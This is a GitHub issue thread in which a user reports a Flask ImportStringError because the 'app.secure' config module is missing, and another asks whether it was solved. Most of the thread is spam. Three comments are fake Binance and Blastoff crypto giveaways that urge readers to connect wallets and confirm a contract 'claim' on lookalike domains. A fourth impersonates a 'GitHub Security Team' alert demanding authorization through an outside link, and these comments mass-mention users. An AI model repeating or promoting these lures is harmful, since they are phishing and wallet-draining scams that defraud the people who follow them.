### ISSUE TITLE
运行过程中的发生报错

### ISSUE THREAD

**Issue by michealzhang13** [unlimitbladeworks/traffic-monitor#4]
我在运行过程中，发生以下报错，是不是代码有误？
  File "/Applications/anaconda3/lib/python3.7/site-packages/werkzeug/utils.py", line 578, in import_string
    return getattr(module, obj_name)

AttributeError: module 'app' has no attribute 'secure'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

  File "/Applications/anaconda3/lib/python3.7/site-packages/werkzeug/utils.py", line 580, in import_string
    raise ImportError(e)

ImportError: module 'app' has no attribute 'secure'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

  File "/Users/michealchong/Downloads/traffic-monitor-master/run.py", line 11, in <module>
    app = create_app()

  File "/Users/michealchong/Downloads/traffic-monitor-master/app/__init__.py", line 16, in create_app
    app.config.from_object('app.secure')

  File "/Applications/anaconda3/lib/python3.7/site-packages/flask/config.py", line 174, in from_object
    obj = import_string(obj)

  File "/Applications/anaconda3/lib/python3.7/site-packages/werkzeug/utils.py", line 585, in import_string
    ImportStringError, ImportStringError(import_name, e), sys.exc_info()[2]

  File "/Applications/anaconda3/lib/python3.7/site-packages/werkzeug/_compat.py", line 147, in reraise
    raise value.with_traceback(tb)

  File "/Applications/anaconda3/lib/python3.7/site-packages/werkzeug/utils.py", line 580, in import_string
    raise ImportError(e)

ImportStringError: import_string() failed for 'app.secure'. Possible reasons are:

- missing __init__.py in a package;
- package or module path not included in sys.path;
- duplicated package or module name taking precedence in sys.path;
- missing module, class, function or variable;

Debugged import:

- 'app' found in '/Users/michealchong/Downloads/traffic-monitor-master/app/__init__.py'.
- 'app.secure' not found.

Original exception:

ImportError: module 'app' has no attribute 'secure'

**Comment by wuchao1111** [comment]
你好 请问解决了吗

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @onesecurity, @yihanghang, @gmertk, @Aozh1, @yierx, @Jonnybestdo, @FighterAircraft

**Comment by RFH1999** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
robinxb, @kongtou168, @lin-ziming, @suexiy, @forvicky, @a498476715, @sunwaylive, @kfihihc, @ChenYujunjks, @LyyDandelion, @tristan1027, @wufengtao1, @Dotown, @ALongLi, @JustHwj, @tinybad, @xuzhongnang, @akanoodle, @GarenWoo, @lghthon

**Comment by appwrk-it-solutions** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
panliaoming, @wab301, @xujie666, @ACERY1, @CNcorazon, @JokerRun, @benli0822, @webxy, @AnythingFromBigBan, @aredcup, @HLhello, @whileGreatHair, @shdwaker, @HeroFrank, @hellosee, @Remember2015, @violinheart, @devadutta, @bestjn, @bigbigbigbigbig, @youmengwuyan, @sigaritus, @doyoudooo, @zenghao0708, @susyimes, @CaesarWangRuiyuan, @xiaoyierle, @RFH1999, @Demontf, @zeromake, @AbstractThink, @gang-bo, @Jimmycheong, @guoyuqi, @johnshwang, @singinzrain, @Aozh1, @i015289, @lauys, @WeiXiaoan, @langer007520, @zyuanx, @pinker12, @shenshanlaoyuan, @zackrt, @hooluupog, @2freedom, @hnq90, @ejacky, @KunPengRen
